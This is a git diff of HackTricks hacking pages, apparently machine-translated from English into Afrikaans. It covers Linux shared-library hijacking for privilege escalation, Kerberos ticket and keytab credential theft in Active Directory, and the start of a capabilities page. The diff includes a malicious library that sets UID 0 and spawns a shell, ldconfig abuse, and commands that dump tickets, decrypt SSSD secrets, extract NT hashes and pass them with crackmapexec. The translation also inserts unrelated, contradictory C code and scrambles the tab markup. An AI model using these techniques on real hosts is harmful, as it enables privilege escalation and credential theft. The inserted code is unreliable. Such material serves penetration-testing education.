-## Prepare the environment +## Bereid de omgeving voor -In the following section you can find the code of the files we are going to use to prepare the environment +In de volgende sectie vind je de code van de bestanden die we gaan gebruiken om de omgeving voor te bereiden {% tabs %} {% tab title="sharedvuln.c" %} @@ -25,65 +25,90 @@ In the following section you can find the code of the files we are going to use #include "libcustom.h" int main(){ - printf("Welcome to my amazing application!\n"); - vuln_func(); - return 0; +printf("Welcome to my amazing application!\n"); +vuln_func(); +return 0; } ``` -{% endtab %} - {% tab title="libcustom.h" %} + +Hierdie lêer definieer die funksies en strukture vir die `libcustom` biblioteek. + +```c +#ifndef LIBCUSTOM_H +#define LIBCUSTOM_H + +#include + +// Funksie om 'n boodskap na die skerm te druk +void print_message(const char* message); + +// Funksie om twee getalle op te tel +int add_numbers(int a, int b); + +#endif /* LIBCUSTOM_H */ +``` + +{% endtab %} ```c #include void vuln_func(); ``` -{% endtab %} - {% tab title="libcustom.c" %} + +Hier is 'n voorbeeld van 'n eenvoudige C-program wat 'n aangepaste biblioteek, libcustom.so, gebruik: + +```c +#include + +void custom_function() { + printf("Hierdie is 'n aangepaste funksie in die libcustom.so biblioteek.\n"); +} +``` + +Hierdie program bevat 'n enkele funksie, `custom_function()`, wat 'n eenvoudige boodskap na die uitvoer skryf. Hierdie funksie sal gebruik word in die volgende voorbeeld om die priviligie-escalasie te demonstreer. + +{% endtab %} ```c #include void vuln_func() { - puts("Hi"); +puts("Hi"); } ``` +{% tabs %} +{% tab title="Afrikaans" %} +1. **Skep** daardie lêers op jou rekenaar in dieselfde vouer +2. **Kompileer** die **biblioteek**: `gcc -shared -o libcustom.so -fPIC libcustom.c` +3. **Kopieer** `libcustom.so` na `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) +4. **Kompileer** die **uitvoerbare lêer**: `gcc sharedvuln.c -o sharedvuln -lcustom` + +### Kontroleer die omgewing + +Kontroleer dat _libcustom.so_ vanaf _/usr/lib_ **gelaai** word en dat jy die binêre lêer kan **uitvoer**. {% endtab %} {% endtabs %} - -1. **Create** those files in your machine in the same folder -2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` -3. **Copy** `libcustom.so` to `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs) -4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` - -### Check the environment - -Check that _libcustom.so_ is being **loaded** from _/usr/lib_ and that you can **execute** the binary. - ``` $ ldd sharedvuln - linux-vdso.so.1 => (0x00007ffc9a1f7000) - libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) - /lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) - -$ ./sharedvuln +linux-vdso.so.1 => (0x00007ffc9a1f7000) +libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000) +/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000) + +$ ./sharedvuln Welcome to my amazing application! Hi ``` +## Uitbuiting -## Exploit - -In this scenario we are going to suppose that **someone has created a vulnerable entry** inside a file in _/etc/ld.so.conf/_: - +In hierdie scenario gaan ons aanneem dat **iemand 'n kwesbare inskrywing geskep het** binne 'n lêer in _/etc/ld.so.conf/_: ```bash sudo echo "/home/ubuntu/lib" > /etc/ld.so.conf.d/privesc.conf ``` - -The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ -**Download and compile** the following code inside that path: - +Die kwesbare gids is _/home/ubuntu/lib_ (waar ons skryftoegang het).\ +**Laai die volgende kode af en stel dit saam** binne daardie pad: ```c //gcc -shared -o libcustom.so -fPIC libcustom.c @@ -92,91 +117,82 @@ The vulnerable folder is _/home/ubuntu/lib_ (where we have writable access).\ #include void vuln_func(){ - setuid(0); - setgid(0); - printf("I'm the bad library\n"); - system("/bin/sh",NULL,NULL); +setuid(0); +setgid(0); +printf("I'm the bad library\n"); +system("/bin/sh",NULL,NULL); } ``` +Nou dat ons die kwaadwillige libcustom-biblioteek binne die verkeerd gekonfigureerde pad geskep het, moet ons wag vir 'n herlaai of vir die root-gebruiker om `ldconfig` uit te voer (as jy hierdie binêre lêer as `sudo` kan uitvoer of as dit die `suid-bit` het, sal jy dit self kan uitvoer). -Now that we have **created the malicious libcustom library inside the misconfigured** path, we need to wait for a **reboot** or for the root user to execute **`ldconfig`** (_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_). - -Once this has happened **recheck** where is the `sharevuln` executable loading the `libcustom.so` library from: - +Sodra dit gebeur het, **herkontroleer** waar die `sharevuln` uitvoerbare lêer die `libcustom.so`-biblioteek laai vanaf: ```c $ldd sharedvuln - linux-vdso.so.1 => (0x00007ffeee766000) - libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) - /lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) +linux-vdso.so.1 => (0x00007ffeee766000) +libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000) +/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000) ``` - -As you can see it's **loading it from `/home/ubuntu/lib`** and if any user executes it, a shell will be executed: - +Soos u kan sien, laai dit dit vanaf `/home/ubuntu/lib` en as enige gebruiker dit uitvoer, sal 'n skulp uitgevoer word: ```c -$ ./sharedvuln +$ ./sharedvuln Welcome to my amazing application! I'm the bad library $ whoami ubuntu ``` - {% hint style="info" %} -Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. +Let wel dat ons in hierdie voorbeeld nie voorregte verhoog het nie, maar deur die opdragte wat uitgevoer word te wysig en **te wag vir die root- of ander bevoorregte gebruiker om die kwesbare binêre lêer uit te voer**, sal ons in staat wees om voorregte te verhoog. {% endhint %} -### Other misconfigurations - Same vuln +### Ander verkeerde konfigurasies - Dieselfde kwesbaarheid -In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\ -But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. +In die vorige voorbeeld het ons 'n verkeerde konfigurasie vervals waar 'n administrateur **'n nie-bevoorregte vouer binne 'n konfigurasie-lêer binne `/etc/ld.so.conf.d/`** ingestel het.\ +Maar daar is ander verkeerde konfigurasies wat dieselfde kwesbaarheid kan veroorsaak, as jy **skryfregte** het in 'n **konfigurasie-lêer** binne `/etc/ld.so.conf.d`, in die vouer `/etc/ld.so.conf.d` of in die lêer `/etc/ld.so.conf`, kan jy dieselfde kwesbaarheid konfigureer en uitbuit. -## Exploit 2 - -**Suppose you have sudo privileges over `ldconfig`**.\ -You can indicate `ldconfig` **where to load the conf files from**, so we can take advantage of it to make `ldconfig` load arbitrary folders.\ -So, lets create the files and folders needed to load "/tmp": +## Uitbuiting 2 +**Stel dat jy sudo-voorregte het oor `ldconfig`**.\ +Jy kan `ldconfig` aandui **waar om die konf-lêers vanaf te laai**, sodat ons dit kan benut om `ldconfig` willekeurige vouers te laat laai.\ +So, laat ons die lêers en vouers skep wat nodig is om "/tmp" te laai: ```bash cd /tmp echo "include /tmp/conf/*" > fake.ld.so.conf echo "/tmp" > conf/evil.conf ``` - -Now, as indicated in the **previous exploit**, **create the malicious library inside `/tmp`**.\ -And finally, lets load the path and check where is the binary loading the library from: - +Nou, soos aangedui in die **vorige uitbuit**, **skep die skadelike biblioteek binne `/tmp`**.\ +En uiteindelik, laai die pad en kyk waar die binêre lading die biblioteek vandaan: ```bash ldconfig -f fake.ld.so.conf ldd sharedvuln - linux-vdso.so.1 => (0x00007fffa2dde000) - libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) - libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) - /lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) +linux-vdso.so.1 => (0x00007fffa2dde000) +libcustom.so => /tmp/libcustom.so (0x00007fcb07756000) +libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fcb0738c000) +/lib64/ld-linux-x86-64.so.2 (0x00007fcb07958000) ``` - -**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.** +**Soos u kan sien, kan u dieselfde kwesbaarheid uitbuit deur sudo-voorregte oor `ldconfig` te hê.** {% hint style="info" %} -I **didn't find** a reliable way to exploit this vuln if `ldconfig` is configured with the **suid bit**. The following error appear: `/sbin/ldconfig.real: Can't create temporary cache file /etc/ld.so.cache~: Permission denied` +Ek **het nie** 'n betroubare manier gevind om hierdie kwesbaarheid uit te buit as `ldconfig` gekonfigureer is met die **suid-bit**. Die volgende fout verskyn: `/sbin/ldconfig.real: Kan nie tydelike kaslêer /etc/ld.so.cache~ skep nie: Toestemming geweier` {% endhint %} -## References +## Verwysings * [https://www.boiteaklou.fr/Abusing-Shared-Libraries.html](https://www.boiteaklou.fr/Abusing-Shared-Libraries.html) * [https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2](https://blog.pentesteracademy.com/abusing-missing-library-for-privilege-escalation-3-minute-read-296dcf81bec2) -* Dab machine in HTB +* Dab-masjien in HTB
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As u u **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel u haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/linux-hardening/privilege-escalation/linux-active-directory.md b/linux-hardening/privilege-escalation/linux-active-directory.md index 15d5b74fa..a114a6605 100644 --- a/linux-hardening/privilege-escalation/linux-active-directory.md +++ b/linux-hardening/privilege-escalation/linux-active-directory.md @@ -1,28 +1,28 @@ -# Linux Active Directory +# Linux Aktiewe Gids
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-A linux machine can also be present inside an Active Directory environment. +'n Linux-rekenaar kan ook binne 'n Aktiewe Gids-omgewing teenwoordig wees. -A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine. +'n Linux-rekenaar in 'n AD kan **verskillende CCACHE-kaartjies binne lêers stoor. Hierdie kaartjies kan gebruik en misbruik word soos enige ander kerberos-kaartjie**. Om hierdie kaartjies te lees, moet jy die eienaar van die kaartjie of **root** binne die rekenaar wees. -## Enumeration +## Enumerasie -### AD enumeration from linux +### AD enumerasie vanaf Linux -If you have access over an AD in linux (or bash in Windows) you can try [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) to enumerate the AD. +As jy toegang het tot 'n AD in Linux (of bash in Windows), kan jy [https://github.com/lefayjey/linWinPwn](https://github.com/lefayjey/linWinPwn) probeer om die AD te enumereer. -You can also check the following page to learn **other ways to enumerate AD from linux**: +Jy kan ook die volgende bladsy raadpleeg om **ander maniere om AD vanaf Linux te enumereer** te leer: {% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} [pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) @@ -30,28 +30,27 @@ You can also check the following page to learn **other ways to enumerate AD from ### FreeIPA -FreeIPA is an open-source **alternative** to Microsoft Windows **Active Directory**, mainly for **Unix** environments. It combines a complete **LDAP directory** with an MIT **Kerberos** Key Distribution Center for management akin to Active Directory. Utilizing the Dogtag **Certificate System** for CA & RA certificate management, it supports **multi-factor** authentication, including smartcards. SSSD is integrated for Unix authentication processes. Learn more about it in: +FreeIPA is 'n oopbron **alternatief** vir Microsoft Windows **Aktiewe Gids**, hoofsaaklik vir **Unix**-omgewings. Dit kombineer 'n volledige **LDAP-gids** met 'n MIT **Kerberos** Sleutelverspreidingsentrum vir bestuur soortgelyk aan Aktiewe Gids. Deur gebruik te maak van die Dogtag **Sertifikaatstelsel** vir CA & RA sertifikaatbestuur, ondersteun dit **multi-faktor**-verifikasie, insluitend slimkaarte. SSSD is geïntegreer vir Unix-verifikasieprosesse. Lees meer daaroor in: {% content-ref url="../freeipa-pentesting.md" %} [freeipa-pentesting.md](../freeipa-pentesting.md) {% endcontent-ref %} -## Playing with tickets +## Speel met kaartjies ### Pass The Ticket -In this page you are going to find different places were you could **find kerberos tickets inside a linux host**, in the following page you can learn how to transform this CCache tickets formats to Kirbi (the format you need to use in Windows) and also how to perform a PTT attack: +Op hierdie bladsy sal jy verskillende plekke vind waar jy **kerberos-kaartjies binne 'n Linux-gashouer kan vind**, op die volgende bladsy kan jy leer hoe om hierdie CCache-kaartjie-formate na Kirbi te omskep (die formaat wat jy in Windows moet gebruik) en ook hoe om 'n PTT-aanval uit te voer: {% content-ref url="../../windows-hardening/active-directory-methodology/pass-the-ticket.md" %} [pass-the-ticket.md](../../windows-hardening/active-directory-methodology/pass-the-ticket.md) {% endcontent-ref %} -### CCACHE ticket reuse from /tmp +### CCACHE-kaartjie-hergebruik vanaf /tmp -CCACHE files are binary formats for **storing Kerberos credentials** are typically stored with 600 permissions in `/tmp`. These files can be identified by their **name format, `krb5cc_%{uid}`,** correlating to the user's UID. For authentication ticket verification, the **environment variable `KRB5CCNAME`** should be set to the path of the desired ticket file, enabling its reuse. - -List the current ticket used for authentication with `env | grep KRB5CCNAME`. The format is portable and the ticket can be **reused by setting the environment variable** with `export KRB5CCNAME=/tmp/ticket.ccache`. Kerberos ticket name format is `krb5cc_%{uid}` where uid is the user UID. +CCACHE-lêers is binêre formate vir **stoor van Kerberos-legitimasie** word tipies gestoor met 600-permissies in `/tmp`. Hierdie lêers kan geïdentifiseer word deur hul **naamformaat, `krb5cc_%{uid}`,** wat ooreenstem met die gebruiker se UID. Vir verifikasie van die legitieme kaartjie moet die **omgewingsveranderlike `KRB5CCNAME`** ingestel word op die pad van die gewenste kaartjielêer, sodat dit hergebruik kan word. +Lys die huidige kaartjie wat vir legitimasie gebruik word met `env | grep KRB5CCNAME`. Die formaat is draagbaar en die kaartjie kan **hergebruik word deur die omgewingsveranderlike** in te stel met `export KRB5CCNAME=/tmp/ticket.ccache`. Die naamformaat van die Kerberos-kaartjie is `krb5cc_%{uid}` waar uid die gebruiker se UID is. ```bash # Find tickets ls /tmp/ | grep krb5cc @@ -60,87 +59,72 @@ krb5cc_1000 # Prepare to use it export KRB5CCNAME=/tmp/krb5cc_1000 ``` +### CCACHE-kaartjies hergebruik van sleutelring -### CCACHE ticket reuse from keyring - -**Kerberos tickets stored in a process's memory can be extracted**, particularly when the machine's ptrace protection is disabled (`/proc/sys/kernel/yama/ptrace_scope`). A useful tool for this purpose is found at [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), which facilitates the extraction by injecting into sessions and dumping tickets into `/tmp`. - -To configure and use this tool, the steps below are followed: +**Kerberos-kaartjies wat in die geheue van 'n proses gestoor word, kan onttrek word**, veral wanneer die ptrace-beskerming van die masjien gedeaktiveer is (`/proc/sys/kernel/yama/ptrace_scope`). 'n Nuttige instrument vir hierdie doel is beskikbaar by [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey), wat die onttrekking fasiliteer deur in sessies in te spuit en kaartjies na `/tmp` te dump. +Om hierdie instrument te konfigureer en te gebruik, word die volgende stappe gevolg: ```bash git clone https://github.com/TarlogicSecurity/tickey cd tickey/tickey make CONF=Release /tmp/tickey -i ``` - -This procedure will attempt to inject into various sessions, indicating success by storing extracted tickets in `/tmp` with a naming convention of `__krb_UID.ccache`. +Hierdie prosedure sal probeer om in verskeie sessies in te spuit, sukses aandui deur geëkstraeerde kaartjies in `/tmp` te stoor met 'n naamkonvensie van `__krb_UID.ccache`. -### CCACHE ticket reuse from SSSD KCM +### CCACHE-kaartjiehergebruik vanaf SSSD KCM -SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions. - -Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**. +SSSD onderhou 'n kopie van die databasis by die pad `/var/lib/sss/secrets/secrets.ldb`. Die ooreenstemmende sleutel word gestoor as 'n verborge lêer by die pad `/var/lib/sss/secrets/.secrets.mkey`. Standaard is die sleutel slegs leesbaar as jy **root**-regte het. +Deur \*\*`SSSDKCMExtractor` \*\* aan te roep met die --database en --key parameters, sal die databasis geanaliseer word en die geheime **ontsleutel**. ```bash git clone https://github.com/fireeye/SSSDKCMExtractor python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey ``` +Die **kerberos-blob van die geloofsbewaarplek kan omskep word in 'n bruikbare Kerberos CCache-lêer** wat aan Mimikatz/Rubeus oorgedra kan word. -The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus. - -### CCACHE ticket reuse from keytab - +### Hergebruik van CCACHE-kaartjie vanaf sleuteltabel ```bash git clone https://github.com/its-a-feature/KeytabParser python KeytabParser.py /etc/krb5.keytab klist -k /etc/krb5.keytab ``` +### Haal rekeninge uit /etc/krb5.keytab -### Extract accounts from /etc/krb5.keytab - -Service account keys, essential for services operating with root privileges, are securely stored in **`/etc/krb5.keytab`** files. These keys, akin to passwords for services, demand strict confidentiality. - -To inspect the keytab file's contents, **`klist`** can be employed. The tool is designed to display key details, including the **NT Hash** for user authentication, particularly when the key type is identified as 23. +Diensrekening sleutels, noodsaaklik vir dienste wat met root-voorregte werk, word veilig gestoor in **`/etc/krb5.keytab`** lêers. Hierdie sleutels, soortgelyk aan wagwoorde vir dienste, vereis streng vertroulikheid. +Om die inhoud van die keytab-lêer te ondersoek, kan **`klist`** gebruik word. Die instrument is ontwerp om sleutelbesonderhede te vertoon, insluitend die **NT Hash** vir gebruikersverifikasie, veral wanneer die sleutel tipe as 23 geïdentifiseer word. ```bash klist.exe -t -K -e -k FILE:C:/Path/to/your/krb5.keytab # Output includes service principal details and the NT Hash ``` - -For Linux users, **`KeyTabExtract`** offers functionality to extract the RC4 HMAC hash, which can be leveraged for NTLM hash reuse. - +Vir Linux-gebruikers bied **`KeyTabExtract`** funksionaliteit om die RC4 HMAC-hash uit te trek, wat gebruik kan word vir hergebruik van NTLM-hash. ```bash -python3 keytabextract.py krb5.keytab +python3 keytabextract.py krb5.keytab # Expected output varies based on hash availability ``` - -On macOS, **`bifrost`** serves as a tool for keytab file analysis. - +Op macOS dien **`bifrost`** as 'n instrument vir die analise van keytab-lêers. ```bash ./bifrost -action dump -source keytab -path /path/to/your/file ``` - -Utilizing the extracted account and hash information, connections to servers can be established using tools like **`crackmapexec`**. - +Deur gebruik te maak van die onttrekte rekening- en hasinligting, kan verbinding met bedieners tot stand gebring word deur middel van gereedskap soos **`crackmapexec`**. ```bash crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDOMAIN" ``` - -## References +## Verwysings * [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) * [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey) * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 0c13b6978..4596855d6 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1,98 +1,93 @@ -# Linux Capabilities +# Linux-vermoëns
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\\ +​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.\\ {% embed url="https://www.rootedcon.com/" %} -## Linux Capabilities +## Linux-vermoëns -Linux capabilities divide **root privileges into smaller, distinct units**, allowing processes to have a subset of privileges. This minimizes the risks by not granting full root privileges unnecessarily. +Linux-vermoëns verdeel **root-voorregte in kleiner, onderskeibare eenhede**, wat prosesse in staat stel om 'n subset van vermoëns te hê. Dit verminder die risiko deur nie onnodige volle root-voorregte toe te ken nie. -### The Problem: -- Normal users have limited permissions, affecting tasks like opening a network socket which requires root access. +### Die Probleem: +- Normale gebruikers het beperkte toestemmings, wat take soos die oopmaak van 'n netwerksocket wat root-toegang vereis, beïnvloed. -### Capability Sets: +### Vermoënskoppelvlakke: -1. **Inherited (CapInh)**: - - **Purpose**: Determines the capabilities passed down from the parent process. - - **Functionality**: When a new process is created, it inherits the capabilities from its parent in this set. Useful for maintaining certain privileges across process spawns. - - **Restrictions**: A process cannot gain capabilities that its parent did not possess. +1. **Geërf (CapInh)**: +- **Doel**: Bepaal die vermoëns wat van die ouerproses oorgedra word. +- **Funksionaliteit**: Wanneer 'n nuwe proses geskep word, erf dit die vermoëns van sy ouer in hierdie stel. Dit is nuttig om sekere voorregte oor prosesverwekings te handhaaf. +- **Beperkings**: 'n Proses kan nie vermoëns verkry wat sy ouer nie besit het nie. -2. **Effective (CapEff)**: - - **Purpose**: Represents the actual capabilities a process is utilizing at any moment. - - **Functionality**: It's the set of capabilities checked by the kernel to grant permission for various operations. For files, this set can be a flag indicating if the file's permitted capabilities are to be considered effective. - - **Significance**: The effective set is crucial for immediate privilege checks, acting as the active set of capabilities a process can use. +2. **Effektief (CapEff)**: +- **Doel**: Verteenwoordig die werklike vermoëns wat 'n proses op enige oomblik gebruik. +- **Funksionaliteit**: Dit is die stel vermoëns wat deur die kern nagegaan word om toestemming vir verskeie operasies te verleen. Vir lêers kan hierdie stel 'n vlag wees wat aandui of die toegelate vermoëns van die lêer as effektief beskou moet word. +- **Betrokkenheid**: Die effektiewe stel is van kritieke belang vir onmiddellike voorregnagaan, en tree op as die aktiewe stel vermoëns wat 'n proses kan 